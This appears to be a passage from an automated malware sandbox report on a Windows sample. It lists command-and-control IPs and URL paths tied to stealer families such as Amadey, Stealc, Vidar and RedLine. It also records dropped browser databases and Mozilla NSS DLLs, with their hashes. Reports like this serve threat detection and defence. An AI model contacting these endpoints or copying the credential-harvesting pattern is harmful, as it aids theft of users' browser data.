                        RzvHe92EQb.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81/Kiru9gu/index.php
                        85.28.47.4EZrw1nNIpG.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        KgXj6BW5dZ.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        T8TLibvQ1C.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        HWyC5T1f8a.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        FREE-NET-ASFREEnetEUEZrw1nNIpG.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 147.45.47.155
                        Loader.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                        • 147.45.47.64
                        Aquantia_Setup 2.21.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                        • 147.45.47.64
                        setup.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                        • 147.45.47.155
                        setup.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                        • 147.45.47.64
                        Galaxy Swapper v2.0.3.exeGet hashmaliciousLummaC, XmrigBrowse
                        • 147.45.47.81
                        file.exeGet hashmaliciousRisePro StealerBrowse
                        • 147.45.47.126
                        SecuriteInfo.com.Win32.PWSX-gen.1558.15324.exeGet hashmaliciousPureLog StealerBrowse
                        • 193.233.203.218
                        4Ip0IVHqJ3.exeGet hashmaliciousRisePro StealerBrowse
                        • 147.45.47.126
                        http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                        • 147.45.78.74
                        GES-ASRUEZrw1nNIpG.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        2snSKQHbDz.exeGet hashmaliciousRedLineBrowse
                        • 85.28.47.7
                        KgXj6BW5dZ.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        T8TLibvQ1C.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        HWyC5T1f8a.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        xS6ePhELv0.exeGet hashmaliciousRedLineBrowse
                        • 85.28.47.7
                        6a7R9UXFMM.elfGet hashmaliciousMiraiBrowse
                        • 85.28.26.9
                        WNvt5lJRrT.elfGet hashmaliciousMiraiBrowse
                        • 85.28.26.0
                        hbqK0qfLnv.elfGet hashmaliciousMiraiBrowse
                        • 85.28.26.0
                        bwyqaMjMfW.elfGet hashmaliciousMiraiBrowse
                        • 85.28.26.4
                        FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUEZrw1nNIpG.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81
                        file.exeGet hashmaliciousRisePro StealerBrowse
                        • 77.91.77.66
                        hsRju5CPK2.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                        • 77.91.77.81
                        setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                        • 77.91.77.81
                        90ZF1EDs9h.exeGet hashmaliciousRisePro StealerBrowse
                        • 77.91.77.66
                        setup.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81
                        mCTacyNuyM.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                        • 77.91.77.81
                        Ke5ufWcgxp.exeGet hashmaliciousRisePro StealerBrowse
                        • 77.91.77.66
                        yWny5Jds8b.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                        • 77.91.77.81
                        file.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                        • 77.91.77.81
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\ProgramData\freebl3.dllEZrw1nNIpG.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          KgXj6BW5dZ.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                            T8TLibvQ1C.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                              HWyC5T1f8a.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                DqnftBv2b9.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                  Set-up.exeGet hashmaliciousAmadey, Vidar, XmrigBrowse
                                    75MwheiQ7I.exeGet hashmaliciousAmadeyBrowse
                                      ljwIPDSwFi.exeGet hashmaliciousDarkGate, MailPassView, VidarBrowse
                                        Qiv6UE0Veq.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                          f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                            C:\ProgramData\mozglue.dllEZrw1nNIpG.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                              KgXj6BW5dZ.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                T8TLibvQ1C.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                  HWyC5T1f8a.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                    DqnftBv2b9.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                      Set-up.exeGet hashmaliciousAmadey, Vidar, XmrigBrowse
                                                        75MwheiQ7I.exeGet hashmaliciousAmadeyBrowse
                                                          ljwIPDSwFi.exeGet hashmaliciousDarkGate, MailPassView, VidarBrowse
                                                            Qiv6UE0Veq.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                              f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):0.8508558324143882
                                                                Encrypted:false
                                                                SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                MD5:933D6D14518371B212F36C3835794D75
                                                                SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                Category:dropped
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.1239949490932863
                                                                Encrypted:false
                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):5242880
                                                                Entropy (8bit):0.0357803477377646
                                                                Encrypted:false
                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                MD5:76D181A334D47872CD2E37135CC83F95
                                                                SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                Category:dropped
                                                                Size (bytes):40960
                                                                Entropy (8bit):0.8553638852307782
                                                                Encrypted:false
                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):51200
                                                                Entropy (8bit):0.8745947603342119
                                                                Encrypted:false
                                                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                MD5:378391FDB591852E472D99DC4BF837DA
                                                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):10237
                                                                Entropy (8bit):5.498288591230544
                                                                Encrypted:false
                                                                SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                MD5:0F58C61DE9618A1B53735181E43EE166
                                                                SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                Malicious:false
                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                Category:dropped
                                                                Size (bytes):98304
                                                                Entropy (8bit):0.08235737944063153
                                                                Encrypted:false
                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                Category:dropped
                                                                Size (bytes):106496
                                                                Entropy (8bit):1.136471148832945
                                                                Encrypted:false
                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):685392
                                                                Entropy (8bit):6.872871740790978
                                                                Encrypted:false
                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: EZrw1nNIpG.exe, Detection: malicious, Browse
                                                                • Filename: KgXj6BW5dZ.exe, Detection: malicious, Browse
                                                                • Filename: T8TLibvQ1C.exe, Detection: malicious, Browse
                                                                • Filename: HWyC5T1f8a.exe, Detection: malicious, Browse
                                                                • Filename: DqnftBv2b9.exe, Detection: malicious, Browse
                                                                • Filename: Set-up.exe, Detection: malicious, Browse
                                                                • Filename: 75MwheiQ7I.exe, Detection: malicious, Browse
                                                                • Filename: ljwIPDSwFi.exe, Detection: malicious, Browse
                                                                • Filename: Qiv6UE0Veq.exe, Detection: malicious, Browse
                                                                • Filename: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe, Detection: malicious, Browse
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):608080
                                                                Entropy (8bit):6.833616094889818
                                                                Encrypted:false
                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: EZrw1nNIpG.exe, Detection: malicious, Browse
                                                                • Filename: KgXj6BW5dZ.exe, Detection: malicious, Browse
                                                                • Filename: T8TLibvQ1C.exe, Detection: malicious, Browse
                                                                • Filename: HWyC5T1f8a.exe, Detection: malicious, Browse
                                                                • Filename: DqnftBv2b9.exe, Detection: malicious, Browse
                                                                • Filename: Set-up.exe, Detection: malicious, Browse
                                                                • Filename: 75MwheiQ7I.exe, Detection: malicious, Browse
                                                                • Filename: ljwIPDSwFi.exe, Detection: malicious, Browse
                                                                • Filename: Qiv6UE0Veq.exe, Detection: malicious, Browse
                                                                • Filename: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe, Detection: malicious, Browse
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):450024
                                                                Entropy (8bit):6.673992339875127
                                                                Encrypted:false
                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2046288
                                                                Entropy (8bit):6.787733948558952
                                                                Encrypted:false
                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):257872
                                                                Entropy (8bit):6.727482641240852
                                                                Encrypted:false
                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):80880
                                                                Entropy (8bit):6.920480786566406
                                                                Encrypted:false
                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1902080
                                                                Entropy (8bit):7.951961711404246
                                                                Encrypted:false
                                                                SSDEEP:49152:e0ftgUKHdwp0kgfmTLm+NzGCQTJP8p2B:eIBK9vkgfwLXGCQTJ
                                                                MD5:EBD6A9BB1E8E1C7357A9426791B6D14F
                                                                SHA1:1DEC06CBAED2F636FF3C86D830083FE40E279559
                                                                SHA-256:E389D15E3072A01FD1822AAD60331EA5FC716918963B03E1BBDFBE9CA1129312
                                                                SHA-512:E2B9C368A6FEEC387EA3F5035240F4669C568A29A2DD6DB55AC4A18EE7A679641B1FE3E6729E66D7391C5958B2E7DB6B7E3DC250516C67B4DCFF4E90CE7E7963
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJXr>.Xr>.Xr>...=.Vr>...;..r>...:.Jr>...=.Nr>...;.-r>...:.Lr>...?.Kr>.Xr?..r>...7.Yr>.....Yr>...<.Yr>.RichXr>.........................PE..L...WYPf..............................K...........@.......................... L......U....@.................................V...j....p........................K.............................H.K..................................................... . .`..........................@....rsrc........p......................@....idata ............................@... .P+.........................@...kvnoqpwr......1.....................@...skikhnnm......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):685392
                                                                Entropy (8bit):6.872871740790978
                                                                Encrypted:false
                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):608080
                                                                Entropy (8bit):6.833616094889818
                                                                Encrypted:false
                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
